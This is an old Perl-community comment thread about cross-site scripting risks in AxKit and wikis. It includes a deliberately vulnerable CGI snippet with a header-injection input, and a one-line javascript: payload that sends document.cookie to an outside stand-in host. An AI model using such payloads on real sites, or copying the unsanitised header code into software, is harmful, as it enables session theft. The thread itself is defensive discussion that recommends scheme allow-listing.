Stories
Slash Boxes
Comments
NOTE: use Perl; is on undef hiatus. You can read content, but you can't post it. More info will be forthcoming forthcomingly.

All the Perl that's Practical to Extract and Report

The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
 Full
 Abbreviated
 Hidden
More | Login | Reply
Loading... please wait.
  • Do I get it right that with AxKit it is impossible to inject new tags into output? If yes, then it makes making XSS holes much harder but not impossible cause XSS it is not just injection of dangerous tags into output. Imagine for example public web service that let's people to exchange URL's (let's call it "Shared bookmarks"). Obvious possible XSS hole is not verifying schema part of submited URL to be clear from dangerous schemas like 'javascript'. I doubt AxKit can automatically protect from this kind of programming errors.
    --

    Ilya Martynov (http://martynov.org/ [martynov.org])

    • You're absolutely right, and I'm no security expert, so just how much damage can you do with the javascript: scheme? Is it limited to one function call, or can you chain lots of javascript into one method.
      • At least with Mozilla you can chain several function calls. BTW there are other types of XSS attacks which as I understand AxKit cannot protect from. Like arbitrary user input passed into response HTTP headers.
        --

        Ilya Martynov (http://martynov.org/ [martynov.org])

        • arbitrary user input passed into response HTTP headers.

          Mind explaining how this works? I still don't know enough about XSS, but it's a technique that has fascinated me ever since I watched Jeffrey Baker demo it at the Open Source Conference 2.5 years ago.
          • Take this perl CGI for example:

            my $cgi = CGI->new;
            # print headers
            print "Content-type: text/html\n";
            print "Set-Cookie: cookie=" . $cgi->param('cookie') . "\n";
            print "\n";
            # print content
            print "<html>.....</html>";

            Attacker can pass as value of "cookie" parameter something like "\n\n<javascript>....</javascript>" so this CGI ends up printing:

            Content-type: text/html
            Set-Cookie: cookie=

            <javascript>...</javascript>

            <html>.....</html&g t;

            See? Since arbitrar

            --

            Ilya Martynov (http://martynov.org/ [martynov.org])

      • I don't think it's limited to one call, but even if it is you always have Good Ol' eval() there so it don't make much of a diff I'm afraid.

        --

        -- Robin Berjon [berjon.com]

        • OK, so given any link you have to check it starts with /^(https?|ftp):/. Sounds fairly straightforward (though I don't do any checking in the AxKit wiki I don't think).

          Still, I think overall that means you've got a lot less coding to do with AxKit than with other (inferior ;-) solutions.
          • AxKit has the pro re XSS that it will be more likely to blow up given some treacherous charset than other solutions will be, especially if you charconv from UTF-8 to Latin-X at the end. Apart from that, it's prolly just as open as anything that deals with user-provided content.

            I'm not sure there's much to protecting the Wiki. A Wiki is, by definition, well, XSS enabled :) It pretty much works based on trusting other people. At any rate if you want to protect against javascript URLs, I'd check on !/

            --

            -- Robin Berjon [berjon.com]

            • I'm not sure there's much to protecting the Wiki

              Very, very, very wrong. Security module of client side scripting is that there is single trust zone per one hostname. If you have, say, properly coded ecommerce shop and wiki with XSS bugs sitting on same domain than ecommerce shop is also vulnerable. Attacker needs only to lure ecommerce shop user on part of wiki with XSS bug and, bummer, user's auth coookie is known to "bad" guy.

              --

              Ilya Martynov (http://martynov.org/ [martynov.org])

              • Oh yeah, that I know. I was thinking about axkit.org. And I must say I haven't seen many Wiki that were on the same domain as an e-commerce site, it would be quite dangerous imho. There are so many ways to get JS code to run (URL, cookie-munging, on* event handlers, redirects, script elements...).

                --

                -- Robin Berjon [berjon.com]

            • I'd explicitly list "good" schemas and reject all others. Various browsers used to support various dangerous schemas in addition to javascript. For example I recall some versions of MSIE had a bug which allowed to run javascript via about: schema.
              --

              Ilya Martynov (http://martynov.org/ [martynov.org])

              • Depends on what kind of security you want. For axkit.org's Wiki I'd allow everything, including javascript:, so that we can have bookmarklets in there. For a site that has sensitive information I wouldn't use a Wiki.

                --

                -- Robin Berjon [berjon.com]

                • Too late. Pod::SAX now explicitly only allows (https?|ftp|mailto|s?news|nntp).

                  Javascript is just too dangerous.

                  There's probably still bugs in the wiki in that it allows XML input, so you may be able to sneak something by that way, but hopefully the XSLT should disallow anything but known tags (and filter attributes sanely).
      • I forget the exact code, but you can do something like javascript:document.open("http://www.example.com/stealcookie.pl?cookie=" + document.cookie). You really need to explicitly check for JavaScript, which also means checking for derivatives like ecmascript:, as well as all the URL-encoded forms (encoding into %xx). IIRC, we URI-unescape it in Slash, then check the scheme against /script$/.